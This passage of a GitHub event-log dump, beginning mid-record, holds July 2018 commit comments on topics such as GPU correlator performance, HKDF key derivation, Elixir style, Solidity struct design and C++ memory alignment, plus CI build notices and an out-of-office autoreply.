GPU correlator I can think about how to do the calibration. \n\nWe also need to remove the auto-correlations, I’ll probably make like Nithya and grid them directly and subtract them. Might mess up your elegant code however..\n\nBest,\n\nJames\n\n\n\n\n> On 18 Jul 2018, at 12:34, jaycedowell <notifications@github.com> wrote:\n> \n> I think that the initial stutter is from creating/moving the grid and result arrays over to the GPU. We could probably get better performance by using pinned, aka, cuda_host, memory. We could also hide it by moving the array initialization into the block initialization so that the memory is ready before we start using it.\n> \n> Another big performance hit in here is that I'm promoting everything to numpy.complex64 and then transferring to the GPU. I ended up having to do this because my older GPU (compute capability 3.0) doesn't support ci8+ci8 -> complex64 matrix operations. This should be possible on newer (cc >= 5.0) GPUs and would save a lot of bandwidth copying to the GPU.\n> \n> The last thing that comes to mind is how/where the images are accumulated. Right now we are pulling off each image set and then accumulating it. If we could accumulate on the GPU then we can reduce the number of times we have to copy the image off to once per integration. I'm not sure how feasible that is, though. It all depends on if we can move that accumulation step forward or not.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/nithyanandan/EPIC/commit/26ece00054952e44837043125590263504ccb0e0#commitcomment-29754930>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AB73hBQ99CtgE9tvw6AnL1HoqkO12J-vks5uH43jgaJpZM4VVJVj>.\n> \n\n"}},"created_at":"2018-07-18T19:49:21Z"}
{"id":"7985099248","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave-intl/bat-go"},"payload":{"comment":{"id":29755074,"position":25,"line":25,"path":"utils/passphrase/passphrase.go","commit_id":"ab0ec7f6a7092cbabbe19e8251c509c1e95281fe","created_at":"2018-07-18T19:50:18Z","updated_at":"2018-07-18T19:50:18Z","author_association":"NONE","body":"just FYI the `info` field is `[0]` here because the seed is HKDF'ed a second time in brave sync to derive the NaCl encryption key: https://github.com/brave/sync/blob/staging/lib/crypto.js#L27. This second usage of HKDF uses `[1]` as the info so that it derives a different key than the first usage. You can keep incrementing info in order to derive multiple keys based on a single seed."}},"created_at":"2018-07-18T19:50:18Z"}
{"id":"7985104184","type":"CommitCommentEvent","actor":{"login":"Dennis273"},"repo":{"name":"Dennis273/DB-project-2"},"payload":{"comment":{"id":29755083,"position":null,"line":null,"path":null,"commit_id":"4a16ac340c85311f61994427b3690cfa3de68230","created_at":"2018-07-18T19:51:21Z","updated_at":"2018-07-18T19:51:21Z","author_association":"OWNER","body":"那一大堆console.log还是得拿掉吧"}},"created_at":"2018-07-18T19:51:21Z"}
{"id":"7985106562","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":29755087,"position":null,"line":null,"path":null,"commit_id":"1f63e0c70c46887b498f5a10ee1f69780264ac4e","created_at":"2018-07-18T19:51:51Z","updated_at":"2018-07-18T19:51:51Z","author_association":"MEMBER","body":"Way better!"}},"created_at":"2018-07-18T19:51:51Z"}
{"id":"7985108869","type":"CommitCommentEvent","actor":{"login":"dustingraham"},"repo":{"name":"lavary/laravel-menu"},"payload":{"comment":{"id":29755093,"position":103,"line":472,"path":"src/Lavary/Menu/Builder.php","commit_id":"c9be1d2e724077576cde4c394c1483d121723457","created_at":"2018-07-18T19:52:19Z","updated_at":"2018-07-18T19:52:19Z","author_association":"COLLABORATOR","body":"Bug per #224 "}},"created_at":"2018-07-18T19:52:19Z"}
{"id":"7985113289","type":"CommitCommentEvent","actor":{"login":"veyalla"},"repo":{"name":"Azure/iot-edge-virtual-kubelet-provider"},"payload":{"comment":{"id":29755100,"position":null,"line":null,"path":null,"commit_id":"2f4d3c56abdb0439c6c41422e2cea55c6e21fc39","created_at":"2018-07-18T19:53:15Z","updated_at":"2018-07-18T19:53:15Z","author_association":"CONTRIBUTOR","body":"yes, intermittently running into: https://github.com/virtual-kubelet/virtual-kubelet/issues/229"}},"created_at":"2018-07-18T19:53:15Z"}
{"id":"7985116183","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"neverovda/ruby_learning"},"payload":{"comment":{"id":29755108,"position":32,"line":32,"path":"lesson_1/rightTriangle.rb","commit_id":"24482c70fdd4eac4c7304f1106e96ce1dc16377c","created_at":"2018-07-18T19:53:51Z","updated_at":"2018-07-18T19:53:51Z","author_association":"NONE","body":"Привет, да, ты совершенно прав, так это и называется\r\nМожешь посмотреть здесь подробней http://tony.pitluga.com/2011/08/08/destructuring-with-ruby.html"}},"created_at":"2018-07-18T19:53:51Z"}
{"id":"7985119964","type":"CommitCommentEvent","actor":{"login":"JonasWeismueller"},"repo":{"name":"Azure/azure-sdk-for-python"},"payload":{"comment":{"id":29755117,"position":null,"line":null,"path":null,"commit_id":"0489ff9345f8d8f74cd15ec6406a66de6885aff4","created_at":"2018-07-18T19:54:38Z","updated_at":"2018-07-18T19:54:38Z","author_association":"NONE","body":"There is a pre-release which already contains the bugfix, see https://github.com/Azure/azure-sdk-for-python/commit/0489ff9345f8d8f74cd15ec6406a66de6885aff4#commitcomment-29754231"}},"created_at":"2018-07-18T19:54:38Z"}
{"id":"7985124956","type":"CommitCommentEvent","actor":{"login":"simonini"},"repo":{"name":"thredded/thredded"},"payload":{"comment":{"id":29755127,"position":null,"line":null,"path":null,"commit_id":"d8542faa4117139282bb831166e63a76eddd9c0a","created_at":"2018-07-18T19:55:40Z","updated_at":"2018-07-18T19:55:40Z","author_association":"NONE","body":"👏👏👏👏"}},"created_at":"2018-07-18T19:55:40Z"}
{"id":"7985126428","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"LineageOS/android_device_oneplus_msm8998-common"},"payload":{"comment":{"id":29755131,"position":null,"line":null,"path":null,"commit_id":"19ee80da0f89771461a326637720a8adee5682a9","created_at":"2018-07-18T19:56:00Z","updated_at":"2018-07-18T19:56:00Z","author_association":"NONE","body":":clap: "}},"created_at":"2018-07-18T19:56:00Z"}
{"id":"7985127073","type":"CommitCommentEvent","actor":{"login":"neumanndaniel"},"repo":{"name":"Azure/iot-edge-virtual-kubelet-provider"},"payload":{"comment":{"id":29755133,"position":null,"line":null,"path":null,"commit_id":"2f4d3c56abdb0439c6c41422e2cea55c6e21fc39","created_at":"2018-07-18T19:56:08Z","updated_at":"2018-07-18T19:56:08Z","author_association":"CONTRIBUTOR","body":"Thanks! Good to know."}},"created_at":"2018-07-18T19:56:08Z"}
{"id":"7985129289","type":"CommitCommentEvent","actor":{"login":"ry"},"repo":{"name":"piscisaureus/deno"},"payload":{"comment":{"id":29755137,"position":123,"line":95,"path":"build_extra/rust/rust.gni","commit_id":"d6ec07380220df5dec4eb22061596103df3550c1","created_at":"2018-07-18T19:56:33Z","updated_at":"2018-07-18T19:56:33Z","author_association":"NONE","body":"Remove?"}},"created_at":"2018-07-18T19:56:33Z"}
{"id":"7985130099","type":"CommitCommentEvent","actor":{"login":"JonathanHaas"},"repo":{"name":"JonathanHaas/penn-today-ci"},"payload":{"comment":{"id":29755138,"position":null,"line":null,"path":null,"commit_id":"d0ced834daf0b8a5d97c17cb78aae7bc67d0be3d","created_at":"2018-07-18T19:56:42Z","updated_at":"2018-07-18T19:56:42Z","author_association":"OWNER","body":"Created multidev environment [penn-today-ci#pr-184](https://dashboard.pantheon.io/sites/4efb815f-6135-4a6f-97a8-9a974be0bd7a#pr-184).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-184-penn-today-ci.pantheonsite.io/)"}},"created_at":"2018-07-18T19:56:42Z"}
{"id":"7985133438","type":"CommitCommentEvent","actor":{"login":"tpDBL"},"repo":{"name":"RocketChat/Rocket.Chat"},"payload":{"comment":{"id":29755146,"position":5,"line":6,"path":"packages/rocketchat-ui/client/components/icon.js","commit_id":"ec92ef6367fe067d892447a8b9d471c651a3658d","created_at":"2018-07-18T19:57:24Z","updated_at":"2018-07-18T19:57:24Z","author_association":"CONTRIBUTOR","body":"\n\nIch bin bis 30.07.2018 abwesend.\n\nIhre Nachricht wird nicht weitergeleitet. Ich werde diese nach meiner\nRückkehr bearbeiten.\n\nBei wichtigen Fragen rufen Sie bitte meine Kollegen unter der Durchwahl\n+430 an,\noder schicken Sie eine Mail an support.ibm-notes@dbl-zentrale.com.\n\n\nHinweis: Dies ist eine automatische Antwort auf Ihre Nachricht  \"Re:\n[RocketChat/Rocket.Chat] Fixed svg for older chrome browsers bug #11414\n(ec92ef6)\" gesendet am 18.07.2018 21:11:50.\n\nDiese ist die einzige Benachrichtigung, die Sie empfangen werden, während\ndiese Person abwesend ist.\n\nWir stellen uns vor - in unserem Unternehmensfilm und Social Media  \n"}},"created_at":"2018-07-18T19:57:24Z"}
{"id":"7985133518","type":"CommitCommentEvent","actor":{"login":"tpDBL"},"repo":{"name":"RocketChat/Rocket.Chat"},"payload":{"comment":{"id":29755147,"position":5,"line":6,"path":"packages/rocketchat-ui/client/components/icon.js","commit_id":"ec92ef6367fe067d892447a8b9d471c651a3658d","created_at":"2018-07-18T19:57:25Z","updated_at":"2018-07-18T19:57:25Z","author_association":"CONTRIBUTOR","body":"\n\nIch bin bis 30.07.2018 abwesend.\n\nIhre Nachricht wird nicht weitergeleitet. Ich werde diese nach meiner\nRückkehr bearbeiten.\n\nBei wichtigen Fragen rufen Sie bitte meine Kollegen unter der Durchwahl\n+430 an,\noder schicken Sie eine Mail an support.ibm-notes@dbl-zentrale.com.\n\n\nHinweis: Dies ist eine automatische Antwort auf Ihre Nachricht  \"Re:\n[RocketChat/Rocket.Chat] Fixed svg for older chrome browsers bug #11414\n(ec92ef6)\" gesendet am 18.07.2018 21:24:58.\n\nDiese ist die einzige Benachrichtigung, die Sie empfangen werden, während\ndiese Person abwesend ist.\n\nWir stellen uns vor - in unserem Unternehmensfilm und Social Media  \n"}},"created_at":"2018-07-18T19:57:25Z"}
{"id":"7985134155","type":"CommitCommentEvent","actor":{"login":"michael-iglesias"},"repo":{"name":"chainpoint/chainpoint-services"},"payload":{"comment":{"id":29755149,"position":19,"line":422,"path":"node-task-handler-service/server.js","commit_id":"175ec9f65a8204a64632e636ed215e4e87b18616","created_at":"2018-07-18T19:57:33Z","updated_at":"2018-07-18T19:57:33Z","author_association":"NONE","body":"@grempe Called to Google Cloud function is indeed wrapped in try/catch"}},"created_at":"2018-07-18T19:57:33Z"}
{"id":"7985135684","type":"CommitCommentEvent","actor":{"login":"evq"},"repo":{"name":"brave-intl/bat-go"},"payload":{"comment":{"id":29755152,"position":25,"line":25,"path":"utils/passphrase/passphrase.go","commit_id":"ab0ec7f6a7092cbabbe19e8251c509c1e95281fe","created_at":"2018-07-18T19:57:53Z","updated_at":"2018-07-18T19:57:53Z","author_association":"CONTRIBUTOR","body":"Interesting! What's the advantage of changing info when deriving a second key versus just reading more bytes from the same hkdf instance? I was looking at the go hkdf example which creates three keys - https://github.com/golang/crypto/blob/master/hkdf/example_test.go#L45"}},"created_at":"2018-07-18T19:57:53Z"}
{"id":"7985136938","type":"CommitCommentEvent","actor":{"login":"tassoevan"},"repo":{"name":"RocketChat/Rocket.Chat"},"payload":{"comment":{"id":29755153,"position":5,"line":6,"path":"packages/rocketchat-ui/client/components/icon.js","commit_id":"ec92ef6367fe067d892447a8b9d471c651a3658d","created_at":"2018-07-18T19:58:08Z","updated_at":"2018-07-18T19:58:08Z","author_association":"CONTRIBUTOR","body":"A newer commit apply the fix for Chrome versions below 55: https://github.com/RocketChat/Rocket.Chat/pull/11416/files#diff-ab1e5b84f6efeebd6d75b5fb2549a4e4R6"}},"created_at":"2018-07-18T19:58:08Z"}
{"id":"7985142156","type":"CommitCommentEvent","actor":{"login":"evq"},"repo":{"name":"brave-intl/bat-go"},"payload":{"comment":{"id":29755163,"position":19,"line":19,"path":"utils/passphrase/passphrase.go","commit_id":"ab0ec7f6a7092cbabbe19e8251c509c1e95281fe","created_at":"2018-07-18T19:59:12Z","updated_at":"2018-07-18T19:59:12Z","author_association":"CONTRIBUTOR","body":"My intent with this library is primarily for making support utilities that can consume browser recovery seeds - so I need to use the same salt\r\n\r\nI was planning to generate another if I ever end up using this in a different capacity. I'll add a note to the comment here to discourage re-use by others"}},"created_at":"2018-07-18T19:59:12Z"}
{"id":"7980194050","type":"CommitCommentEvent","actor":{"login":"dtzWill"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29743084,"position":null,"line":null,"path":null,"commit_id":"caccc40ad01c4159a5a627b17d3db12ac67fa252","created_at":"2018-07-18T02:01:12Z","updated_at":"2018-07-18T02:01:12Z","author_association":"CONTRIBUTOR","body":"Build logs, diff (eh kinda hard to read sorry), for the curious (few other options are new): https://gist.github.com/dtzWill/45e5e2933d7a272299e3c30f780bfe42\r\n\r\nAFAIK all options/changes of this kind are in the busybox changelogs: https://busybox.net/"}},"created_at":"2018-07-18T02:01:12Z"}
{"id":"7980195794","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/mogue3"},"payload":{"comment":{"id":29743088,"position":null,"line":null,"path":null,"commit_id":"1008e07ac3fc749130d33edc6b0b6d0235cc3630","created_at":"2018-07-18T02:01:50Z","updated_at":"2018-07-18T02:01:50Z","author_association":"OWNER","body":"The last one appears to be a false positive claiming `pops[i]` contains a garbage value"}},"created_at":"2018-07-18T02:01:50Z"}
{"id":"7980204110","type":"CommitCommentEvent","actor":{"login":"Themiansequence"},"repo":{"name":"Themiansequence/Data-structure-learning-notes"},"payload":{"comment":{"id":29743095,"position":null,"line":null,"path":null,"commit_id":"d643973d0227a4424febc95b53de0d4899991b94","created_at":"2018-07-18T02:04:50Z","updated_at":"2018-07-18T02:04:50Z","author_association":"OWNER","body":"类中定义的non-static成员要存放在每个对象中，每个对象的存储分配完全一致。\r\nstatic成员可以理解为“存放在类中”（实际上类似C的全局变量，存放在全局存储区，因此，其初始化语法类似全局变量），供同类所有对象共享。\r\n\r\n类为成员变量分配空间时，由于对齐(alignment)的需要，会出现浪费现象。\r\n我调试程序的机器是64位机器，即字长64位，8byte。分配空间的原则是变量不能跨字，否则的话，读写变量时要存取两个字，增加访问内存的次数，效率低。"}},"created_at":"2018-07-18T02:04:50Z"}
{"id":"7980204735","type":"CommitCommentEvent","actor":{"login":"Themiansequence"},"repo":{"name":"Themiansequence/Data-structure-learning-notes"},"payload":{"comment":{"id":29743096,"position":null,"line":null,"path":null,"commit_id":"d643973d0227a4424febc95b53de0d4899991b94","created_at":"2018-07-18T02:05:03Z","updated_at":"2018-07-18T02:05:03Z","author_association":"OWNER","body":"我使用的编译器为每种数据类型分配的存储空间大小为：\r\n\r\nchar             1byte\r\nshort            2byte\r\nint                4byte\r\nlong             8byte\r\nfloat             4byte\r\ndouble         8byte\r\nlong double 16byte\r\n\r\n前4种的unsigned类型大小不变。\r\n\r\n指针变量占8byte。"}},"created_at":"2018-07-18T02:05:03Z"}
{"id":"7980204936","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29743098,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-18T02:05:07Z","updated_at":"2018-07-18T02:05:07Z","author_association":"NONE","body":"159125973_Issue#6843 (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2942 of 2942 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-18T02:05:07Z"}
{"id":"7980205870","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29743101,"position":41,"line":76,"path":"contracts/Remittance.sol","commit_id":"51d066f79cc71928bc9afeb541c818de0c4bd6db","created_at":"2018-07-18T02:05:26Z","updated_at":"2018-07-18T02:05:26Z","author_association":"NONE","body":"Here's something to think about. Here, you require the msg.sender is the exchange and you ask for the paymentID. There is another concern - avoiding the repeated use of identical passwords. Have you considered how you reduce the size of the struct by rolling those concerns up in hash function to feed a mapping?\r\n\r\nConsider `mapping(bytes32 => PaymentStruct) public paymentStructs;`"}},"created_at":"2018-07-18T02:05:26Z"}
{"id":"7980206345","type":"CommitCommentEvent","actor":{"login":"Themiansequence"},"repo":{"name":"Themiansequence/Data-structure-learning-notes"},"payload":{"comment":{"id":29743102,"position":null,"line":null,"path":null,"commit_id":"d643973d0227a4424febc95b53de0d4899991b94","created_at":"2018-07-18T02:05:37Z","updated_at":"2018-07-18T02:05:37Z","author_association":"OWNER","body":"分配次序为：\r\nint double char double int\r\n第1个int占用了第1个字的一半，4个字节。\r\n第1个double占用了第2个字的全部。由于不能跨字，所以第1个字就浪费了4个字节。\r\n\r\nchar占用第3个字的1个字节。浪费了7个字节。\r\n第2个double占用第4个字的全部。\r\n第2个int占用第5个字的一半，浪费4个字节。\r\n\r\n总的空间5个字，40个byte。同理可以分析32字节的例子。"}},"created_at":"2018-07-18T02:05:37Z"}
{"id":"7980206957","type":"CommitCommentEvent","actor":{"login":"Themiansequence"},"repo":{"name":"Themiansequence/Data-structure-learning-notes"},"payload":{"comment":{"id":29743107,"position":null,"line":null,"path":null,"commit_id":"d643973d0227a4424febc95b53de0d4899991b94","created_at":"2018-07-18T02:05:51Z","updated_at":"2018-07-18T02:05:51Z","author_association":"OWNER","body":"改变变量的定义次序，对分配的空间大小可能会有影响。\r\n变量的定义次序，决定了在内存中的相互位置，也决定了“初始化”的次序。"}},"created_at":"2018-07-18T02:05:51Z"}
{"id":"7980209514","type":"CommitCommentEvent","actor":{"login":"Rosabb"},"repo":{"name":"sunrisezxr/project1"},"payload":{"comment":{"id":29743109,"position":null,"line":null,"path":null,"commit_id":"26ee0c45bcd558d3266a17893a89834087cb1c80","created_at":"2018-07-18T02:06:48Z","updated_at":"2018-07-18T02:06:48Z","author_association":"NONE","body":"太猥琐了，这个代码，像你一样！"}},"created_at":"2018-07-18T02:06:48Z"}
{"id":"7980210932","type":"CommitCommentEvent","actor":{"login":"Joreta"},"repo":{"name":"polonius11/vba_workingcode"},"payload":{"comment":{"id":29743110,"position":null,"line":null,"path":null,"commit_id":"fd0086a1c2d56095de3a29707aa1709c2921a732","created_at":"2018-07-18T02:07:21Z","updated_at":"2018-07-18T02:07:21Z","author_association":"NONE","body":"Hey, I have received full access yet!"}},"created_at":"2018-07-18T02:07:21Z"}
{"id":"7980211431","type":"CommitCommentEvent","actor":{"login":"englehardt"},"repo":{"name":"mozilla-services/shavar-experiments"},"payload":{"comment":{"id":29743111,"position":null,"line":null,"path":null,"commit_id":"f069a6401404fb3806938929c54da56fe1a04bce","created_at":"2018-07-18T02:07:33Z","updated_at":"2018-07-18T02:07:33Z","author_association":"CONTRIBUTOR","body":"@fmarier I'll add them to the list generation process right now so I don't forget :)"}},"created_at":"2018-07-18T02:07:33Z"}
{"id":"7980212707","type":"CommitCommentEvent","actor":{"login":"davidstoneham"},"repo":{"name":"davidstoneham/SocialSend"},"payload":{"comment":{"id":29743112,"position":null,"line":null,"path":null,"commit_id":"fa765cf03ad5799e99a46af6d79f551d482e1c50","created_at":"2018-07-18T02:08:03Z","updated_at":"2018-07-18T02:08:03Z","author_association":"OWNER","body":"Hi @hernss this code is not yet fully tested but is required to use out 1 click master node setup on mystakingwallet.com.\r\n\r\nThis ultimately allows the initialising, starting, stopping, destroying of a masternode controlled by the wallet without the need to edit and conf files (or even create a masternode.conf file).\r\n\r\n"}},"created_at":"2018-07-18T02:08:03Z"}
{"id":"7980213726","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29743114,"position":null,"line":null,"path":null,"commit_id":"aefa57b5a3d62b222910b75674b1b40aa1a1232c","created_at":"2018-07-18T02:08:26Z","updated_at":"2018-07-18T02:08:26Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.231`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/231) :tada:"}},"created_at":"2018-07-18T02:08:26Z"}
{"id":"7980215987","type":"CommitCommentEvent","actor":{"login":"Ofekw"},"repo":{"name":"jjxtra/ExchangeSharp"},"payload":{"comment":{"id":29743118,"position":315,"line":315,"path":"ExchangeSharp/API/Common/SignalrManager.cs","commit_id":"e878f6ec23628138a93b581f31d4d45d964735dd","created_at":"2018-07-18T02:09:18Z","updated_at":"2018-07-18T02:09:18Z","author_association":"CONTRIBUTOR","body":"If there's failure here, don't we want to throw the exception otherwise this will silently."}},"created_at":"2018-07-18T02:09:18Z"}
{"id":"7980216804","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29743120,"position":null,"line":null,"path":null,"commit_id":"aefa57b5a3d62b222910b75674b1b40aa1a1232c","created_at":"2018-07-18T02:09:36Z","updated_at":"2018-07-18T02:09:36Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.350`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/405170783) :tada:"}},"created_at":"2018-07-18T02:09:36Z"}
{"id":"7980221674","type":"CommitCommentEvent","actor":{"login":"yawaramin"},"repo":{"name":"code-shoily/elixir_algorithms"},"payload":{"comment":{"id":29743132,"position":2,"line":2,"path":"lib/basic/linked_list.ex","commit_id":"9511b2c6feb138a262c9071cfca409120d709f28","created_at":"2018-07-18T02:11:23Z","updated_at":"2018-07-18T02:11:23Z","author_association":"NONE","body":"This is interesting. I usually use `%__MODULE__{...}` throughout the module to refer to structs."}},"created_at":"2018-07-18T02:11:23Z"}
{"id":"7980223228","type":"CommitCommentEvent","actor":{"login":"slty7"},"repo":{"name":"slty7/java_base"},"payload":{"comment":{"id":29743136,"position":null,"line":null,"path":null,"commit_id":"25c8da2b48646cc9bd8473ae42cd52228f9c3be8","created_at":"2018-07-18T02:11:59Z","updated_at":"2018-07-18T02:11:59Z","author_association":"OWNER","body":"尚方宝剑用于攻击敌人------>武器使用后还是一直存在...\r\nfalse\r\n盖中盖用于恢复魔法值------->蓝屏的使用后就会消失\r\ntrue\r\n"}},"created_at":"2018-07-18T02:11:59Z"}
{"id":"7980227429","type":"CommitCommentEvent","actor":{"login":"yawaramin"},"repo":{"name":"code-shoily/elixir_algorithms"},"payload":{"comment":{"id":29743141,"position":4,"line":4,"path":"lib/basic/linked_list.ex","commit_id":"9511b2c6feb138a262c9071cfca409120d709f28","created_at":"2018-07-18T02:13:30Z","updated_at":"2018-07-18T02:13:30Z","author_association":"NONE","body":"In the functional world I've usually seen this kind of definition: `@type t(a) :: {:cons, a, t(a)} | nil`"}},"created_at":"2018-07-18T02:13:30Z"}
{"id":"7980228627","type":"CommitCommentEvent","actor":{"login":"zixia"},"repo":{"name":"Chatie/wechaty-getting-started"},"payload":{"comment":{"id":29743143,"position":31,"line":35,"path":"examples/starter-bot.js","commit_id":"feae020e4dd5d62baf4ea69fb99ba81efa36ef87","created_at":"2018-07-18T02:13:58Z","updated_at":"2018-07-18T02:13:58Z","author_association":"MEMBER","body":"Because in this simple demo it does not have to do this.\r\n\r\nIf you want to use `await` in this function then you need to add it back.\r\n\r\nDo you think we should keep the `async` declaration to this function for the beginners?"}},"created_at":"2018-07-18T02:13:58Z"}
{"id":"7980232413","type":"CommitCommentEvent","actor":{"login":"j593748152"},"repo":{"name":"j593748152/normaldemo"},"payload":{"comment":{"id":29743150,"position":null,"line":null,"path":null,"commit_id":"6d4acd17f1a65dba9a6a05e060e832723159bf07","created_at":"2018-07-18T02:15:22Z","updated_at":"2018-07-18T02:15:22Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-18T02:15:22Z"}
{"id":"7980232751","type":"CommitCommentEvent","actor":{"login":"yawaramin"},"repo":{"name":"code-shoily/elixir_algorithms"},"payload":{"comment":{"id":29743152,"position":6,"line":6,"path":"lib/basic/linked_list.ex","commit_id":"9511b2c6feb138a262c9071cfca409120d709f28","created_at":"2018-07-18T02:15:29Z","updated_at":"2018-07-18T02:15:29Z","author_association":"NONE","body":"I would recommend using `@enforce_keys [:data]` to make sure `data` can't be omitted."}},"created_at":"2018-07-18T02:15:29Z"}
{"id":"7980239528","type":"CommitCommentEvent","actor":{"login":"yawaramin"},"repo":{"name":"code-shoily/elixir_algorithms"},"payload":{"comment":{"id":29743160,"position":11,"line":11,"path":"lib/basic/linked_list.ex","commit_id":"9511b2c6feb138a262c9071cfca409120d709f28","created_at":"2018-07-18T02:18:02Z","updated_at":"2018-07-18T02:18:02Z","author_association":"NONE","body":"This would usually be called `empty`."}},"created_at":"2018-07-18T02:18:02Z"}
{"id":"7980243604","type":"CommitCommentEvent","actor":{"login":"yawaramin"},"repo":{"name":"code-shoily/elixir_algorithms"},"payload":{"comment":{"id":29743167,"position":13,"line":13,"path":"lib/basic/linked_list.ex","commit_id":"9511b2c6feb138a262c9071cfca409120d709f28","created_at":"2018-07-18T02:19:37Z","updated_at":"2018-07-18T02:19:37Z","author_association":"NONE","body":"This would usually be called `singleton` and type could be `@spec singleton(a) :: t(a) when a: var`"}},"created_at":"2018-07-18T02:19:37Z"}
{"id":"7980244871","type":"CommitCommentEvent","actor":{"login":"rpalmite"},"repo":{"name":"nguyenan/vue"},"payload":{"comment":{"id":29743170,"position":null,"line":null,"path":null,"commit_id":"927b296fd2221242552bb27bb1afa5a20de3f386","created_at":"2018-07-18T02:20:06Z","updated_at":"2018-07-18T02:20:06Z","author_association":"NONE","body":"What's the issue for this commit?"}},"created_at":"2018-07-18T02:20:06Z"}
{"id":"7980245146","type":"CommitCommentEvent","actor":{"login":"code-shoily"},"repo":{"name":"code-shoily/elixir_algorithms"},"payload":{"comment":{"id":29743171,"position":11,"line":11,"path":"lib/basic/linked_list.ex","commit_id":"9511b2c6feb138a262c9071cfca409120d709f28","created_at":"2018-07-18T02:20:12Z","updated_at":"2018-07-18T02:20:12Z","author_association":"OWNER","body":"They usually name the guards is_* "}},"created_at":"2018-07-18T02:20:12Z"}
{"id":"7980246137","type":"CommitCommentEvent","actor":{"login":"yawaramin"},"repo":{"name":"code-shoily/elixir_algorithms"},"payload":{"comment":{"id":29743174,"position":16,"line":16,"path":"lib/basic/linked_list.ex","commit_id":"9511b2c6feb138a262c9071cfca409120d709f28","created_at":"2018-07-18T02:20:33Z","updated_at":"2018-07-18T02:20:33Z","author_association":"NONE","body":"These functions can also be parametrically polymorphic like above."}},"created_at":"2018-07-18T02:20:33Z"}
{"id":"7980247875","type":"CommitCommentEvent","actor":{"login":"Sunev"},"repo":{"name":"uhyo/jinrou"},"payload":{"comment":{"id":29743179,"position":null,"line":null,"path":null,"commit_id":"53eafbeeca75dd274dd92621791a52d81b25ffdd","created_at":"2018-07-18T02:21:12Z","updated_at":"2018-07-18T02:21:12Z","author_association":"CONTRIBUTOR","body":"How the incorrect result looks like? I've got a bug report which might be related with this.\r\n\r\n> [A WolfMinion(MadHunter) tried to shoot an EyesWolf, who is scapegoat, but failed.](https://github.com/Sunev/jinrou/issues/32)"}},"created_at":"2018-07-18T02:21:12Z"}
{"id":"7980255689","type":"CommitCommentEvent","actor":{"login":"xoxuewei"},"repo":{"name":"FBU2018-L3/1-Up"},"payload":{"comment":{"id":29743190,"position":22,"line":22,"path":"One-Up/app/src/main/java/com/l3/one_up/model/Activity.java","commit_id":"72528271cd3f54e754446ae774baf926d889a428","created_at":"2018-07-18T02:24:10Z","updated_at":"2018-07-18T02:24:10Z","author_association":"NONE","body":"Let's call this KEY_INPUT_TYPE for clarity"}},"created_at":"2018-07-18T02:24:10Z"}
{"id":"7980272417","type":"CommitCommentEvent","actor":{"login":"LKI"},"repo":{"name":"zaihui/hutils"},"payload":{"comment":{"id":29743219,"position":14,"line":28,"path":"hutils/validators.py","commit_id":"7e6d040d1d89a9cc49610b00ff181072550cbed2","created_at":"2018-07-18T02:30:15Z","updated_at":"2018-07-18T02:30:15Z","author_association":"MEMBER","body":"有道理，更显式。这就去改~"}},"created_at":"2018-07-18T02:30:15Z"}
{"id":"7980275315","type":"CommitCommentEvent","actor":{"login":"trungams"},"repo":{"name":"idoneam/Canary"},"payload":{"comment":{"id":29743224,"position":null,"line":null,"path":null,"commit_id":"4a2b310241f1132ddcb90b657b30b3d7cda8b2c8","created_at":"2018-07-18T02:31:17Z","updated_at":"2018-07-18T02:31:17Z","author_association":"NONE","body":":o does that work? I was thinking of using `str.replace()`"}},"created_at":"2018-07-18T02:31:17Z"}
{"id":"7980278459","type":"CommitCommentEvent","actor":{"login":"yyf1127324351"},"repo":{"name":"yyf1127324351/LocalGit"},"payload":{"comment":{"id":29743230,"position":null,"line":null,"path":null,"commit_id":"50454b684242ddcb72540c60a007523392a5e64f","created_at":"2018-07-18T02:32:28Z","updated_at":"2018-07-18T02:32:28Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-18T02:32:28Z"}
